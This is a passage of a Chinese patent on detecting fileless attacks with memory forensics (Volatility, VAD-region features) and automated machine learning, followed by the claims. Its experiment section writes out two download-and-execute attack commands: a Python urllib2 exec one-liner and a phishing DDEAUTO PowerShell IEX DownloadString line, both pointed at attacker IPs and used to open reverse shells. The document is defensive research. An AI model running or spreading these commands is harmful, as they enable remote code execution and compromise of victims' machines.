The living-off-the-land attack features include living-off-the-land attacks, the Remote Desktop Protocol, and darknet communication protocols.
The memory images include malicious sample memory images and benign sample memory images.
As an alternative embodiment, the feature extraction module 20 of the present invention specifically includes:
The feature set acquisition sub-module is configured to acquire the feature set of the memory region corresponding to the sample.
The feature extraction sub-module is configured to set up a plug-in based on the memory forensics framework and extract the features of the feature set.
As an alternative embodiment, the data processing module 30 of the present invention specifically includes:
The deduplication operation sub-module is configured to convert the samples into set elements, remove duplicate items, and convert the result back to the original data type.
The normalization operation formula is:
$$x_{\mathrm{norm}} = \frac{x - x_{\min}}{x_{\max} - x_{\min}}$$
where $x_{\mathrm{norm}}$ is the result of the Min-Max normalization conversion function, $x$ is the data of the sample, $x_{\max}$ is the maximum value of the sample data, and $x_{\min}$ is the minimum value of the sample data.
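The two data-processing operations, set-based deduplication and Min-Max normalization in its standard form (x - x_min) / (x_max - x_min), can be sketched together as follows. The function names and the three-column toy rows are assumptions for illustration. Sorting after deduplication and mapping a constant column to 0.0 are design choices of this sketch, not details stated in the patent.

```python
def deduplicate(rows):
    """Convert rows to set elements, drop duplicates, and return a list again."""
    unique = set(tuple(row) for row in rows)
    # Sets are unordered, so sort to make the result reproducible.
    return [list(row) for row in sorted(unique)]


def min_max_normalize(values):
    """Scale values to [0, 1]; a constant column maps to 0.0 to avoid dividing by zero."""
    lo, hi = min(values), max(values)
    if hi == lo:
        return [0.0 for _ in values]
    return [(v - lo) / (hi - lo) for v in values]


def normalize_columns(rows):
    """Apply Min-Max normalization to each numeric column independently."""
    columns = [min_max_normalize(col) for col in zip(*rows)]
    return [list(row) for row in zip(*columns)]


# Toy rows (hypothetical features, e.g. region size and a count).
rows = [[4096, 2], [8192, 6], [4096, 2], [6144, 4]]
unique_rows = deduplicate(rows)
print(unique_rows)
print(normalize_columns(unique_rows))
```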
As an alternative embodiment, the automatic machine learning module 40 of the present invention specifically includes:
The data set dividing sub-module is configured to divide the data set into a training set and a test set, assigning samples at random.
The model training sub-module is configured to perform model training on the training set using the automatic machine learning library, compare the evaluation metrics of different models according to the output, and select the model with the highest precision on the training set as the optimal model.
The model test sub-module is configured to apply the optimal model to the test set, obtain the prediction output of the optimal model, and calculate the evaluation metrics of the optimal model on the test set.
The model judging sub-module is configured to judge, from the evaluation metrics on the test set, whether the optimal model meets the expected target; if not, the parameters are adjusted and training and testing are repeated; if so, the model is deployed in a real application.
Example 3
This example is analyzed with reference to the experiment, as follows:
The attack process is as follows. On the attacker platform (192.168.233.139), a website is set up using Cobalt Strike, a shell.py script is deployed, and a TCP reverse shell connection is started.
The target machine runs the following script: python -c "import urllib2; exec urllib2.urlopen('http://192.168.233.139:8000/shell.py').read();".
A channel from the attacker to the target machine is established, completing the file-free attack. The system memory image is captured, and malicious processes and malicious memory regions are detected. As shown in fig. 3, each sample contains an "Address" field in the format imagename_processid_processname_vadstartaddress_vadendaddress; for example, the sample named 014.vmem_3488_python.exe_0x1480000_0x14bdfff is detected as malicious. This case involves the memory image "014.vmem", the process ID 3488, and the process name "python.exe". The memory region of interest corresponds to a virtual address descriptor with start address 0x1480000 and end address 0x14bdfff.
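The sample identifier format described here can be split back into its fields with a regular expression. The sketch below is an illustration under the assumption that the image name is followed by a purely numeric process ID and that both addresses are hexadecimal with a 0x prefix; the function name `parse_sample_id` and the derived `size` field are not part of the patent.

```python
import re

# imagename_processid_processname_vadstartaddress_vadendaddress
SAMPLE_ID = re.compile(
    r"^(?P<image>.+?)_(?P<pid>\d+)_(?P<process>.+)"
    r"_(?P<start>0x[0-9a-fA-F]+)_(?P<end>0x[0-9a-fA-F]+)$"
)


def parse_sample_id(sample_id):
    """Split a sample identifier into image, PID, process name and VAD range."""
    match = SAMPLE_ID.match(sample_id)
    if match is None:
        raise ValueError("unrecognized sample identifier: " + sample_id)
    start = int(match["start"], 16)
    end = int(match["end"], 16)
    return {
        "image": match["image"],
        "pid": int(match["pid"]),
        "process": match["process"],
        "start": start,
        "end": end,
        "size": end - start + 1,  # the end address is inclusive
    }


info = parse_sample_id("014.vmem_3488_python.exe_0x1480000_0x14bdfff")
print(info["image"], info["pid"], info["process"], hex(info["start"]), hex(info["size"]))
```

For the sample in this case the region spans 0x3e000 bytes (253,952 bytes).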
The Volatility plug-in "vaddump" is used to export the specified memory region. The exported dmp file is then opened with Neo, where the Cobalt Strike "beacon.dll" (shown in fig. 3) is found, along with information about functions associated with reverse code injection.
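Exporting a single VAD region with vaddump can be sketched as a command builder. This assumes the Volatility 2 command-line form, in which vaddump is understood to accept `-p` (process ID), `-b` (VAD base address in hex), and `-D` (output directory); these option names should be checked against the installed version. The profile is not stated for this case, so `Win10x64` is reused from the earlier example purely as a placeholder, and `dump_dir` is a hypothetical directory name.

```python
def vaddump_command(image, profile, pid, base, dump_dir):
    """Build an argument list that dumps one VAD region of one process."""
    return [
        "volatility", "-f", image, "--profile=" + profile,
        "vaddump",
        "-p", str(pid),    # restrict to the suspicious process
        "-b", hex(base),   # dump only the VAD starting at this address
        "-D", dump_dir,    # directory that receives the .dmp file
    ]


# Values from the case above; the profile and directory are placeholders.
argv = vaddump_command("014.vmem", "Win10x64", 3488, 0x1480000, "dump_dir")
print(" ".join(argv))
```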
This embodiment is further analyzed with reference to a case, as follows:
A malicious PowerShell script x1.ps1 is generated on the attacker machine and a reverse-connection listener is started. An Office document is constructed with an embedded DDE command: DDEAUTO C:\windows\system32\cmd.exe "/k powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.233.146/file_shell/x1.ps1')". The malicious document is sent to the target user in a phishing email.
The target user opens the phishing email attachment on the target machine and allows DDE to execute; a connection channel between the attacker and the target machine is established, realizing the file-free attack. A memory image is captured, and the model detects the following two samples as malicious.
Sample one: 008.vmem_2280_powershell.exe_0x1d30000_0x3d2ffff
Sample two: 008.vmem_2280_powershell.exe_0x1d30000_0x3d2ffff
The two sample names denote memory image 008, process powershell, and process ID 2280; the malicious memory regions are 0x1d30000_0x3d2ffff and 0x1d30000_0x3d2ffff. The specified memory regions are exported with vaddump; as shown in figs. 4 and 5, the attack command and the content of the malicious script x1.ps1 are visible. The experimental verification and case analysis demonstrate the accuracy and feasibility of the invention.
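Once a region has been exported, readable commands and script fragments can be located by extracting printable strings from the dump. The sketch below is one possible approach, not the procedure used in the patent. It scans for both ASCII and UTF-16LE strings, since PowerShell text in Windows memory is often stored as UTF-16. The function names, the keyword list, and the synthetic byte blob are all assumptions for illustration.

```python
import re


def extract_strings(data, min_len=6):
    """Return printable ASCII and UTF-16LE strings of at least min_len characters."""
    ascii_pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.decode("ascii") for m in ascii_pattern.findall(data)]
    found += [m.decode("utf-16-le") for m in utf16_pattern.findall(data)]
    return found


def find_indicators(data, keywords):
    """Keep only the extracted strings that contain one of the keywords."""
    lowered = [k.lower() for k in keywords]
    return [s for s in extract_strings(data) if any(k in s.lower() for k in lowered)]


# Synthetic bytes standing in for an exported .dmp file.
blob = (
    b"\x00\x01"
    + "IEX (New-Object Net.WebClient)".encode("utf-16-le")
    + b"\xff\xfe"
    + b"powershell.exe"
    + b"\x00"
)
print(find_indicators(blob, ["webclient", "powershell"]))
```

For a real dump, `data` would be read with `open(path, "rb").read()`.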
The above description is only of the preferred embodiments of the present invention and is not intended to limit the present invention, but various modifications and variations can be made to the present invention by those skilled in the art. Any modification, equivalent replacement, improvement, etc. made within the spirit and principle of the present invention should be included in the protection scope of the present invention.

Claims (10)

1. A file-free attack investigation method based on memory evidence obtaining, characterized by comprising the following steps:
step S1: running benign samples and carrying out file-free attacks, respectively, to obtain memory images; the file-free attack types comprise code injection, script attacks, and living-off-the-land attacks; the memory images comprise malicious sample memory images and benign sample memory images;
step S2: taking each virtual address descriptor node of a memory image as a sample, and extracting the features of the memory region corresponding to the sample;
step S3: performing a deduplication operation on the samples and a normalization operation on the numerical values of the samples to construct a data set;
step S4: dividing the data set into a training set and a test set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the data set for testing to obtain a test result;
step S5: performing verification analysis on the samples detected as malicious, according to the test result.
2. The file-free attack investigation method based on memory evidence obtaining according to claim 1, wherein running benign samples and carrying out file-free attacks, respectively, to obtain memory images specifically comprises:
the file-free attack types comprise code injection, script attacks, and living-off-the-land attacks;
the code injection features comprise functions, binaries, code, encryption information, countermeasures, memory, Trojans, and attack frameworks;
the script attack features comprise malicious strings, neutral strings, and scripts, which are used respectively to detect malicious command prompt scripts, neutral command prompt scripts, and other malicious scripts;
the living-off-the-land attack features comprise living-off-the-land attacks, the Remote Desktop Protocol, and darknet communication protocols;
the memory images comprise malicious sample memory images and benign sample memory images.
3. The file-free attack investigation method based on memory evidence obtaining according to claim 1, wherein taking each virtual address descriptor node of a memory image as a sample and extracting the features of the memory region corresponding to the sample specifically comprises:
acquiring a feature set of the memory region corresponding to the sample;
setting up a plug-in based on the memory forensics framework, and extracting the features of the feature set.
4. The file-free attack investigation method based on memory evidence obtaining according to claim 1, wherein performing a deduplication operation on the samples and a normalization operation on the numerical values of the samples to construct a data set specifically comprises:
converting the samples into set elements, removing duplicate items, and converting the result back to the original data type;
the normalization operation formula is:
$$x_{\mathrm{norm}} = \frac{x - x_{\min}}{x_{\max} - x_{\min}}$$
where $x_{\mathrm{norm}}$ is the result of the Min-Max normalization conversion function, $x$ is the data of the sample, $x_{\max}$ is the maximum value of the sample data, and $x_{\min}$ is the minimum value of the sample data.
5. The file-free attack investigation method based on memory evidence obtaining according to claim 1, wherein dividing the data set into a training set and a test set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the data set for testing to obtain a test result specifically comprises:
dividing the data set into a training set and a test set, and assigning the samples at random;
performing model training on the training set by using an automatic machine learning library, comparing the evaluation metrics of different models according to the output, and selecting the model with the highest precision on the training set as the optimal model;
applying the optimal model to the test set to obtain the prediction output of the optimal model, and calculating the evaluation metrics of the optimal model on the test set;
judging, from the evaluation metrics on the test set, whether the optimal model meets the expected target; if not, adjusting the parameters and repeating training and testing; if so, deploying the model in a real application.
6. A file-free attack investigation system based on memory evidence obtaining, characterized in that the system comprises:
a memory image acquisition module, configured to run benign samples and carry out file-free attacks, respectively, to obtain memory images; the file-free attack types comprise code injection, script attacks, and living-off-the-land attacks; the memory images comprise malicious sample memory images and benign sample memory images;
a feature extraction module, configured to take each virtual address descriptor node of a memory image as a sample and extract the features of the memory region corresponding to the sample;
a data processing module, configured to perform a deduplication operation on the samples and a normalization operation on the numerical values of the samples to construct a data set;
an automatic machine learning module, configured to divide the data set into a training set and a test set, perform model training on the training set by using an automatic machine learning library, select an optimal model, and apply the optimal model to the data set for testing to obtain a test result;
a verification analysis module, configured to perform verification analysis on the samples detected as malicious, according to the test result.
7. The file-free attack investigation system based on memory evidence obtaining according to claim 6, wherein the memory image acquisition module is specified as follows:
the file-free attack types comprise code injection, script attacks, and living-off-the-land attacks;
the code injection features comprise functions, binaries, code, encryption information, countermeasures, memory, Trojans, and attack frameworks;
the script attack features comprise malicious strings, neutral strings, and scripts, which are used respectively to detect malicious command prompt scripts, neutral command prompt scripts, and other malicious scripts;
the living-off-the-land attack features comprise living-off-the-land attacks, the Remote Desktop Protocol, and darknet communication protocols;
the memory images comprise malicious sample memory images and benign sample memory images.
8. The file-free attack investigation system based on memory evidence obtaining according to claim 6, wherein the feature extraction module specifically comprises:
a feature set acquisition sub-module, configured to acquire a feature set of the memory region corresponding to the sample;
a feature extraction sub-module, configured to set up a plug-in based on the memory forensics framework and extract the features of the feature set.
9. The file-free attack investigation system based on memory evidence obtaining according to claim 6, wherein the data processing module specifically comprises:
a deduplication operation sub-module, configured to convert the samples into set elements, remove duplicate items, and convert the result back to the original data type;
the normalization operation formula is:
$$x_{\mathrm{norm}} = \frac{x - x_{\min}}{x_{\max} - x_{\min}}$$
where $x_{\mathrm{norm}}$ is the result of the Min-Max normalization conversion function, $x$ is the data of the sample, $x_{\max}$ is the maximum value of the sample data, and $x_{\min}$ is the minimum value of the sample data.
10. The file-free attack investigation system based on memory evidence obtaining according to claim 6, wherein the automatic machine learning module specifically comprises:
a data set dividing sub-module, configured to divide the data set into a training set and a test set and assign the samples at random;
a model training sub-module, configured to perform model training on the training set by using an automatic machine learning library, compare the evaluation metrics of different models according to the output, and select the model with the highest precision on the training set as the optimal model;
a model test sub-module, configured to apply the optimal model to the test set to obtain the prediction output of the optimal model, and calculate the evaluation metrics of the optimal model on the test set;
a model judging sub-module, configured to judge, from the evaluation metrics on the test set, whether the optimal model meets the expected target; if not, the parameters are adjusted and training and testing are repeated; if so, the model is deployed in a real application.
CN202311414040.6A 2023-10-30 2023-10-30 File-free attack investigation method and system based on memory evidence obtaining Pending CN117478373A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202311414040.6A CN117478373A (en) 2023-10-30 2023-10-30 File-free attack investigation method and system based on memory evidence obtaining

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202311414040.6A CN117478373A (en) 2023-10-30 2023-10-30 File-free attack investigation method and system based on memory evidence obtaining

Publications (1)

Publication Number Publication Date
CN117478373A true CN117478373A (en) 2024-01-30

Family

ID=89624901

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202311414040.6A Pending CN117478373A (en) 2023-10-30 2023-10-30 File-free attack investigation method and system based on memory evidence obtaining

Country Status (1)

Country Link
CN (1) CN117478373A (en)

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination